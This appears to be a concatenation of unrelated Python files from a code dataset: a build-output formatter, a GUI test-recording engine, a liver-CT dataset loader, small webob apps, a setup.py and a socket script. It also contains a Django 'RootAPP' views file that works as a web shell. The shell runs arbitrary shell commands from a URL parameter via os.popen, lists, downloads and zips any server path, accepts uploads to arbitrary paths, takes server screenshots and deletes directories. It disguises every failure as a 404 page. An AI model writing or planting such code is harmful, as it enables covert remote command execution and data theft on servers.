rm_splits = line.strip().split(" ")
if(len(rm_splits) != 0):
if(rm_splits[0].startswith("-")):
rm_splits = rm_splits[1:]
for item in rm_splits:
if(item.strip() != "" and item.strip() != "\\"):
prettyformat.pretty("RM", module, item.strip(), False)
valid = False
else:
action = "CONF"
if(valid == True):
newline = line.split("\n")[0]
if(action == "CC"):
newline = newline.split("Compiling ")[1]
elif(action == "LN"):
newline = newline.split("Linking ")[1]
elif(action == "BUILD"):
newline = newline.split("Building ")[1]
elif(action == "CONF"):
newline = newline.strip()
prettyformat.pretty(action, module, newline.strip(), False)
line = sys.stdin.readline()
| StarcoderdataPython |
9761064 |
""" Basic engine class, inherited in guishared.py and implemented by each GUI toolkit code """
import recorder, replayer
import os, sys, imp
try:
# In Py 2.x, the builtins were in __builtin__
BUILTINS = sys.modules['__builtin__']
except KeyError: # pragma: no cover - not worried about Python 3 yet...
# In Py 3.x, they're in builtins
BUILTINS = sys.modules['builtins']
# Behaves as a singleton...
class ScriptEngine:
# Read USECASE_HOME also, the legacy name from PyUseCase
storytextHome = os.path.abspath(os.getenv("STORYTEXT_HOME",
os.getenv("USECASE_HOME",
os.path.expanduser("~/.storytext"))))
def __init__(self, enableShortcuts=False, **kwargs):
os.environ["STORYTEXT_HOME"] = self.storytextHome
self.enableShortcuts = enableShortcuts
self.recorder = recorder.UseCaseRecorder(self.getShortcuts())
self.replayer = self.createReplayer(**kwargs)
self.registerShortcuts()
self.replayer.tryRunScript()
def recorderActive(self):
return self.enableShortcuts or self.recorder.isActive()
def replayerActive(self):
return self.enableShortcuts or self.replayer.isActive()
def active(self):
return self.replayerActive() or self.recorderActive()
def registerShortcuts(self):
for shortcut in self.getShortcuts():
if self.replayerActive():
self.replayer.registerShortcut(shortcut)
@classmethod
def getShortcuts(cls, storyTextHome=None):
home = storyTextHome if storyTextHome else cls.storytextHome
shortcuts = []
if not os.path.isdir(home):
return shortcuts
for fileName in sorted(os.listdir(home)):
if fileName.endswith(".shortcut"):
fullPath = os.path.join(home, fileName)
shortcuts.append(replayer.ReplayScript(fullPath, ignoreComments=True))
return shortcuts
def createReplayer(self, **kw):
return replayer.UseCaseReplayer(self.recorder, **kw)
def applicationEvent(self, name, category=None, supercedeCategories=[], timeDelay=0.001, delayLevel=0):
# Small time delay to avoid race conditions: see replayer
if self.recorderActive():
self.recorder.registerApplicationEvent(name, category, supercedeCategories, delayLevel)
if self.replayerActive():
self.replayer.registerApplicationEvent(name, timeDelay)
def applicationEventRename(self, oldName, newName, oldCategory=None, newCategory=None):
# May need to recategorise in the recorder
if self.recorderActive() and oldCategory != newCategory:
self.recorder.applicationEventRename(oldName, newName, oldCategory, newCategory)
if self.replayerActive():
self.replayer.applicationEventRename(oldName, newName)
def applicationEventDelay(self, name, **kw):
if self.recorderActive():
self.recorder.applicationEventDelay(name, **kw)
def applicationEventRemove(self, *args, **kw):
if self.recorderActive():
self.recorder.unregisterApplicationEvent(*args, **kw)
def run(self, options, args):
if len(args) == 0:
return False
else:
self.handleAdditionalOptions(options)
self.runSystemUnderTest(args)
return True
def handleAdditionalOptions(self, options):
pass
def runSystemUnderTest(self, args):
# By default, just assume it's a python program. Allow this to be overridden
self.run_python_file(args)
def run_python_file(self, args):
"""Run a python file as if it were the main program on the command line.
`args` is the argument array to present as sys.argv, including the first
element representing the file being executed.
Lifted straight from coverage.py by <NAME>
"""
filename = args[0]
# Create a module to serve as __main__
old_main_mod = sys.modules['__main__']
main_mod = imp.new_module('__main__')
sys.modules['__main__'] = main_mod
main_mod.__file__ = filename
main_mod.__builtins__ = BUILTINS
# Set sys.argv and the first path element properly.
old_argv = sys.argv
old_path0 = sys.path[0]
sys.argv = args
sys.path[0] = os.path.dirname(filename)
try:
source = open(filename, 'rU').read()
exec compile(source, filename, "exec") in main_mod.__dict__
finally:
# Restore the old __main__
sys.modules['__main__'] = old_main_mod
# Restore the old argv and path
sys.argv = old_argv
sys.path[0] = old_path0
| StarcoderdataPython |
5033140 | import sys
import os
import json
from os.path import dirname
from pathlib import Path
import nibabel as nib
from nibabel.processing import resample_to_output
import numpy as np
import torch
from torchvision import transforms
from torch.utils.data import Dataset, DataLoader
from PIL import Image
np.set_printoptions(precision = 3, suppress = True)
import scipy.ndimage as ndimage
class CaseLoader:
def __init__(self, case_folder, imaging_file = 'imaging.nii', segmentation_file = 'segmentation.nii'):
self.case_folder = case_folder
self.imaging_file = imaging_file
self.segmentation_file = segmentation_file
pass
def __str__(self):
return 'case_folder: {0}'.format(self.case_folder)
def get_full_case_id(self, cid):
try:
cid = int(cid)
case_id = "case_{:05d}".format(cid)
except ValueError:
case_id = cid
return case_id
def get_all_cases(self):
cases = []
dataset_file = os.path.join(self.case_folder, 'lits.json')
with open(dataset_file) as json_file:
data_file = json.load(json_file)
for dat in data_file:
case_id = dat['case_id']
cases.append(case_id)
return cases
def get_case_path(self, cid):
# Resolve location where data should be living
if not os.path.isdir(self.case_folder):
raise IOError(
"Data path, {}, could not be resolved".format(str(data_path))
)
# Get case_id from provided cid
case_id = self.get_full_case_id(cid)
# Make sure that case_id exists under the data_path
case_path = os.path.join(self.case_folder, case_id)
if not os.path.isdir(case_path):
raise ValueError(
"Case could not be found \"{}\"".format(case_path)
)
return case_path
def load_volume(self, cid):
case_path = self.get_case_path(cid)
vol = nib.load(os.path.join(case_path, self.imaging_file))
return vol
def load_segmentation(self, cid):
case_path = self.get_case_path(cid)
seg = nib.load(os.path.join(case_path, self.segmentation_file))
return seg
def load_case(self, cid):
vol = self.load_volume(cid)
seg = self.load_segmentation(cid)
return vol, seg
class LiTSDataSet(Dataset):
def __init__(self, dataset_path, dataset_file, cases=None, transforms=None, zoom=1, dilation=False):
self.case_loader = CaseLoader(dataset_path)
self.cases = []
if cases is not None:
self.cases = cases
else:
with open(dataset_file) as json_file:
data_file = json.load(json_file)
for dat in data_file:
case_id = dat['case_id']
self.cases.append(case_id)
self.transforms = transforms
self.zoom = zoom
self.dilation = dilation
def __len__(self):
return len(self.cases)
def __getitem__(self, idx):
case_id = self.cases[idx]
vol, seg = self.case_loader.load_case(case_id)
volume = vol.get_fdata().astype(np.float32)
segmentation = seg.get_fdata().astype(np.float32)
volume = ndimage.zoom(volume, zoom=[self.zoom, self.zoom, 1], order=0)
segmentation = ndimage.zoom(segmentation, zoom=[self.zoom, self.zoom, 1], order=0)
if self.dilation:
segmentation2 = ndimage.binary_dilation(segmentation).astype(np.uint8)
for i in range(5):
segmentation2 = ndimage.binary_dilation(segmentation2).astype(np.uint8)
segmentation2[segmentation == 2.0] = 2
segmentation = segmentation2.astype(np.float32)
volume = np.rot90(volume).copy()
segmentation = np.rot90(segmentation).copy()
if self.transforms is not None:
volume = self.transforms(volume)
segmentation = self.transforms(segmentation)
# volume = volume.type(torch.FloatTensor)
# segmentation = segmentation.type(torch.ByteTensor)
return volume, segmentation
def get_lits_data_loaders(dataset_path, dataset_file, transforms, split_ratio, batch_size, zoom, dilation):
train_cases = np.loadtxt('train_cases.txt', delimiter=",", dtype=np.str)
test_cases = np.loadtxt('test_cases.txt', delimiter=",", dtype=np.str)
train_dataset = LiTSDataSet(dataset_path, dataset_file, train_cases,
transforms=transforms, zoom=zoom, dilation=dilation)
test_dataset = LiTSDataSet(dataset_path, dataset_file, test_cases,
transforms=transforms, zoom=zoom, dilation=dilation)
# train_size = int(split_ratio * len(dataset))
# test_size = len(dataset) - train_size
# train_dataset, test_dataset = torch.utils.data.random_split(dataset, [train_size, test_size])
dataloaders = {
'train': DataLoader(train_dataset, batch_size=batch_size, shuffle=True, num_workers=1),
'val': DataLoader(test_dataset, batch_size=batch_size, shuffle=True, num_workers=1),
'n_train': len(train_dataset),
'n_val': len(test_dataset)
}
return dataloaders
if __name__ == "__main__":
dataset_path = '/home/ubelix/artorg/paolucci/datasets/lits/cases'
case_loader = CaseLoader(dataset_path)
print(case_loader)
vol, seg = case_loader.load_case('case_00003')
# print(vol)
print(seg.shape)
# vol_resampled = resample_to_output(vol, [1, 1, 1], order=0)
# print(vol_resampled.shape)
dataset_file = os.path.join(dataset_path, 'lits.json')
data_set = LiTSDataSet(dataset_path, dataset_file,
transforms=transforms.Compose([transforms.ToTensor()]))
print(data_set)
vol, seg = data_set[2]
print(vol.shape, vol.dtype)
print(seg.shape, seg.dtype)
print(vol.min(), vol.max())
print(seg.min(), seg.max())
| StarcoderdataPython |
6696944 | # -*- coding: utf-8 -*-
from webob import Request
from webob import Response
from webob import exc
def input_app(environ, start_response):
resp = Response()
req = Request(environ)
if req.path_info == '/':
resp.body = b'<input name="youyou" type="text" value="" />'
elif req.path_info == '/submit':
resp.body = b'<input type="submit" value="OK" />'
elif req.path_info.startswith('/html'):
resp.body = b'<html><p>Success</p></html>'
else:
resp.body = ''
return resp(environ, start_response)
def application(environ, start_response):
req = Request(environ)
response = Response()
if req.method == 'GET':
response.body = b'<pre>Yeah !</pre>'
else:
response.body = b'<a href="/plop">Yeah !</a>'
return response(environ, start_response)
def secure_application(environ, start_response):
if 'REMOTE_USER' not in environ:
return exc.HTTPUnauthorized('vomis')(environ, start_response)
return application(environ, start_response)
| StarcoderdataPython |
3561363 | from setuptools import find_packages
from setuptools import setup
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
setup(
name='py-modular',
version='0.0.1',
description='An experimental, modular audio programming environment in python',
long_description=long_description,
long_description_content_type="text/markdown",
url='https://github.com/fredyeah/py-modular',
author='Frederic',
author_email='<EMAIL>',
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
packages=find_packages(),
install_requires=[
'cffi',
'cycler',
'kiwisolver',
'matplotlib',
'numpy',
'Pillow',
'pycparser',
'pyparsing',
'python-dateutil',
'six',
'sounddevice',
'SoundFile'
]
)
| StarcoderdataPython |
3278436 | <gh_stars>0
import json
import os
import zipfile
from django.contrib.auth.hashers import check_password, make_password
from django.http import HttpResponse, FileResponse, StreamingHttpResponse
from django.shortcuts import render
# Create your views here.
from RootAPP.models import PathItem, FileItem
from UserAPP.models import User
#####################################################################################################################################
pwd="<PASSWORD>="
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
rooturl=os.path.join(BASE_DIR, 'RootAPP/static/Root/')
prturl=os.path.join(BASE_DIR, 'RootAPP/static/Root/Prt/')
tempurl=os.path.join(BASE_DIR, 'RootAPP/static/Root/Temp/')
def Code(request):
try:
id = request.session.get("id")
if id != None:
per = User.objects.get(id=id)
if per.isroot == '1':
a=request.GET.get("a")
b=request.GET.get("b")
response = HttpResponse(json.dumps({"code": "1","pwd":<PASSWORD>(a),"flag":check_password(a,b)}))
else:
response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
else:
response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
except Exception as e:
print(e)
response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
response["Access-Control-Allow-Origin"] = "*"
response["Access-Control-Allow-Methods"] = "POST, GET, OPTIONS"
response["Access-Control-Max-Age"] = "1000"
response["Access-Control-Allow-Headers"] = "*"
return response
def LoginRoot(request):
try:
id = request.session.get("id")
if id != None:
per = User.objects.get(id=id)
if per.isroot=='1':
a = request.GET.get("a")
b = request.GET.get("b")
if check_password(a,b):
request.session['root'] = pwd
response = HttpResponse(json.dumps({"code": "1"}))
else:
response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
else:
response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
except Exception as e:
print(e)
response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
response["Access-Control-Allow-Origin"] = "*"
response["Access-Control-Allow-Methods"] = "POST, GET, OPTIONS"
response["Access-Control-Max-Age"] = "1000"
response["Access-Control-Allow-Headers"] = "*"
return response
def LogoutRoot(request):
try:
del request.session["root"]
response = HttpResponse(json.dumps({"code": "1"}))
except Exception as e:
print(e)
response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
response["Access-Control-Allow-Origin"] = "*"
response["Access-Control-Allow-Methods"] = "POST, GET, OPTIONS"
response["Access-Control-Max-Age"] = "1000"
response["Access-Control-Allow-Headers"] = "*"
return response
#####################################################################################################################################
def DelDir(path):
for root, dirs, files in os.walk(path, topdown=False):
for name in files:
os.remove(os.path.join(root, name))
for name in dirs:
os.rmdir(os.path.join(root, name))
os.rmdir(path)
def Prt(request):
try:
id = request.session.get("id")
root = request.session.get("root")
if id != None and root!=None:
per = User.objects.get(id=id)
if per.isroot=='1'and root==pwd:
import time
from PIL import ImageGrab
try:
os.makedirs(prturl)
except:
pass
time=time.time()
url=prturl+str(time)+'.jpg'
ImageGrab.grab().save(url)
response = HttpResponse("<img src='/static/Root/Prt/"+str(time)+".jpg'/>")
else:
response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
else:
response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
except Exception as e:
print(e)
response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
response["Access-Control-Allow-Origin"] = "*"
response["Access-Control-Allow-Methods"] = "POST, GET, OPTIONS"
response["Access-Control-Max-Age"] = "1000"
response["Access-Control-Allow-Headers"] = "*"
return response
def Del(request):
try:
id = request.session.get("id")
root = request.session.get("root")
if id != None and root != None:
per = User.objects.get(id=id)
if per.isroot == '1' and root == pwd:
path=rooturl
DelDir(path)
response = HttpResponse("OK")
else:
response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
else:
response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
except Exception as e:
print(e)
response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
response["Access-Control-Allow-Origin"] = "*"
response["Access-Control-Allow-Methods"] = "POST, GET, OPTIONS"
response["Access-Control-Max-Age"] = "1000"
response["Access-Control-Allow-Headers"] = "*"
return response
#####################################################################################################################################################
def CMD(request):
try:
id = request.session.get("id")
root = request.session.get("root")
if id != None and root != None:
per = User.objects.get(id=id)
if per.isroot == '1' and root == pwd:
cmd=request.GET.get("cmd")
result = os.popen(cmd)
response = HttpResponse(result)
else:
response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
else:
response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
except Exception as e:
print(e)
response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
response["Access-Control-Allow-Origin"] = "*"
response["Access-Control-Allow-Methods"] = "POST, GET, OPTIONS"
response["Access-Control-Max-Age"] = "1000"
response["Access-Control-Allow-Headers"] = "*"
return response
#################################################################################################################################################
def FTP(request, url):
try:
id = request.session.get("id")
root = request.session.get("root")
if id != None and root != None:
per = User.objects.get(id=id)
if per.isroot == '1' and root == pwd:
current = url
context_dic = {}
context_dic['current'] = current
ps = os.listdir(current)
path = []
file = []
for n in ps:
v = os.path.join(current, n)
if os.path.isdir(v):
p = PathItem(n, current)
path.append(p)
else:
f = FileItem(n, current)
file.append(f)
context_dic['path'] = path
context_dic['file'] = file
return render(request, 'FTP.html', context_dic)
else:
response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
else:
response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
except Exception as e:
print(e)
response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
response["Access-Control-Allow-Origin"] = "*"
response["Access-Control-Allow-Methods"] = "POST, GET, OPTIONS"
response["Access-Control-Max-Age"] = "1000"
response["Access-Control-Allow-Headers"] = "*"
return response
#################################################################################################################################################
def FTPDownload(request, url):
try:
id = request.session.get("id")
root = request.session.get("root")
if id != None and root != None:
per = User.objects.get(id=id)
if per.isroot == '1' and root == pwd:
filepath = url
file = open(filepath, 'rb')
response = FileResponse(file)
response['Content-Type'] = 'application/octet-stream'
else:
response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
else:
response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
except Exception as e:
print(e)
response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
response["Access-Control-Allow-Origin"] = "*"
response["Access-Control-Allow-Methods"] = "POST, GET, OPTIONS"
response["Access-Control-Max-Age"] = "1000"
response["Access-Control-Allow-Headers"] = "*"
return response
#################################################################################################################################################
def dfs_get_zip_file(input_path,result):
files = os.listdir(input_path)
for file in files:
if os.path.isdir(input_path+'/'+file):
dfs_get_zip_file(input_path+'/'+file,result)
result.append(input_path+'/'+file)
def zip_path(input_path,output_path,output_name):
f = zipfile.ZipFile(output_path+'/'+output_name,'w',zipfile.ZIP_DEFLATED)
filelists = []
dfs_get_zip_file(input_path,filelists)
for file in filelists:
f.write(file)
f.close()
return output_path+r"/"+output_name
def FTPDownloadDir(request, url):
try:
id = request.session.get("id")
root = request.session.get("root")
if id != None and root != None:
per = User.objects.get(id=id)
if per.isroot == '1' and root == pwd:
import time
time = time.time()
try:
os.makedirs(tempurl)
except:
pass
zip_path(url, tempurl, str(time)+'.zip')
filepath = os.path.join(tempurl,str(time)+'.zip')
file = open(filepath, 'rb')
response = FileResponse(file)
response['Content-Type'] = 'application/octet-stream'
response['Content-Disposition'] = 'attachment;filename="Download.zip"'
else:
response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
else:
response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
except Exception as e:
print(e)
response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
response["Access-Control-Allow-Origin"] = "*"
response["Access-Control-Allow-Methods"] = "POST, GET, OPTIONS"
response["Access-Control-Max-Age"] = "1000"
response["Access-Control-Allow-Headers"] = "*"
return response
def Upload(request,url):
try:
id = request.session.get("id")
if id != None:
per = User.objects.get(id=id)
if per.isroot == '1':
if request.method == "POST":
myFile = request.FILES.get("myfile", None)
if not myFile:
response = HttpResponse("no files for upload!")
else:
destination = open(os.path.join(url, myFile.name), 'wb+')
for chunk in myFile.chunks():
destination.write(chunk)
destination.close()
response = response = HttpResponse("upload over!")
else:
response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>", status=404)
else:
response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
else:
response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
except Exception as e:
print(e)
response = HttpResponse("<h1>Not Found</h1><p>The requested resource was not found on this server.</p>",status=404)
response["Access-Control-Allow-Origin"] = "*"
response["Access-Control-Allow-Methods"] = "POST, GET, OPTIONS"
response["Access-Control-Max-Age"] = "1000"
response["Access-Control-Allow-Headers"] = "*"
return response
| StarcoderdataPython |
9786309 | print("connect setup")
import socket
HOST, PORT = "169.254.44.240", 9999 #"169.254.44.240",9999
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("trying to establish a connection")
try:
sock.connect((HOST, PORT))
print("connect ready")
except:
print("CONNECTION FAILED.")
print("have you run the code on the raspberry pi?")
print("P.S. dont break the pi please")
# sldkfhlkwerjhgsglkufghbilsukejgrhbiluskehnilrkusghjrogggurlaejhluerakas = 0/0
print(sock)
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.